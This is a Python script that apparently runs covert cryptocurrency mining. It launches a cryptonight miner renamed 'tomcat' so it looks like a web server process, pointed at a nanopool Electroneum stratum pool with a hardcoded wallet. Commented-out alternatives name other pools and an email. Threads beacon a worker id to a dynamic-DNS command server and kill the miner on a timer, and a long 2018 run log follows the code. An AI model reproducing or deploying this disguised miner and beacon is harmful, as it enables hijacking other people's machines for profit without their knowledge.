import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:48:07.626248
#2018-02-17 17:34:06.263751
#2018-02-17 19:22:05.244252
#2018-02-17 21:12:01.528375
#2018-02-17 22:56:07.018456
#2018-02-18 00:43:03.329428
#2018-02-18 02:32:04.761265
#2018-02-18 04:19:07.168577
#2018-02-18 06:10:06.431688
#2018-02-18 08:01:07.358780
#2018-02-18 09:48:05.735763
#2018-02-18 11:35:07.096698
#2018-02-18 13:20:05.974005
#2018-02-18 15:10:06.478667
#2018-02-18 16:58:07.740179
#2018-02-18 18:47:03.589599
#2018-02-18 20:33:05.404035
#2018-02-18 22:19:06.926494
#2018-02-19 00:08:06.794359
#2018-02-19 01:54:06.275138
#2018-02-19 03:41:05.846881
#2018-02-19 05:26:06.690893
#2018-02-19 07:15:07.331751
#2018-02-19 09:05:07.267099
#2018-02-19 10:54:01.696826
#2018-02-19 12:43:07.835689
#2018-02-19 14:29:07.585251
#2018-02-19 16:17:01.674216
#2018-02-19 18:04:05.908471
#2018-02-19 19:50:01.344191
#2018-02-19 21:37:05.869228
#2018-02-19 23:23:05.366809
#2018-02-20 01:09:01.587013
#2018-02-20 02:57:06.116560
#2018-02-20 04:44:05.650176
#2018-02-20 06:28:05.874612
#2018-02-20 08:13:01.570911
#2018-02-20 09:58:06.879534
#2018-02-20 11:43:10.912881
#2018-02-20 13:31:01.772425
#2018-02-20 15:15:01.451140
#2018-02-20 17:02:01.603499
#2018-02-20 18:49:01.831568
#2018-02-20 20:40:09.428491
#2018-02-20 22:26:06.641195
#2018-02-21 00:08:06.243859
#2018-02-21 01:55:01.450444
#2018-02-21 03:43:05.275139
#2018-02-21 05:31:04.619163
#2018-02-21 07:19:06.885876
#2018-02-21 09:04:07.141919
#2018-02-21 10:52:08.152041
#2018-02-21 12:38:01.799055
#2018-02-21 14:24:03.995419
#2018-02-21 16:11:01.770865
#2018-02-21 18:01:05.339233
#2018-02-21 19:49:01.989267
#2018-02-21 21:35:05.082005
#2018-02-21 23:21:06.852574
#2018-02-22 01:10:04.188471
#2018-02-22 02:56:07.233483
#2018-02-22 04:42:09.107395
#2018-02-22 06:27:06.629524
#2018-02-22 08:14:07.622995
#2018-02-22 10:03:07.012827
#2018-02-22 11:47:01.415119
#2018-02-22 13:32:02.070562
#2018-02-22 15:21:04.175246
#2018-02-22 17:08:08.427712
#2018-02-22 18:56:09.283134
#2018-02-22 20:49:05.096772
#2018-02-22 22:36:01.285737
#2018-02-23 00:22:03.570838
#2018-02-23 02:14:07.822893
#2018-02-23 04:04:07.593410
#2018-02-23 05:50:05.360758
#2018-02-23 07:39:03.851516
#2018-02-23 09:42:07.405855
#2018-02-23 11:45:06.507598
#2018-02-23 13:34:05.268008
#2018-02-23 15:22:10.276653
#2018-02-23 17:11:01.964201
#2018-02-23 18:56:01.968583
#2018-02-23 20:42:06.726214
#2018-02-23 22:31:01.981266
#2018-02-24 00:17:03.951024
#2018-02-24 02:08:08.199581
#2018-02-24 03:58:04.594972
#2018-02-24 05:44:03.573708
#2018-02-24 07:37:05.477347
#2018-02-24 09:22:04.674320
#2018-02-24 11:16:01.723472
#2018-02-24 13:05:04.654114
#2018-02-24 14:54:03.674294
#2018-02-24 16:44:07.827846
#2018-02-24 18:32:05.130760
#2018-02-24 20:19:05.233215
#2018-02-24 22:13:07.034066
#2018-02-25 01:22:05.483940
#2018-02-25 05:01:05.218443
#2018-02-25 09:48:01.237098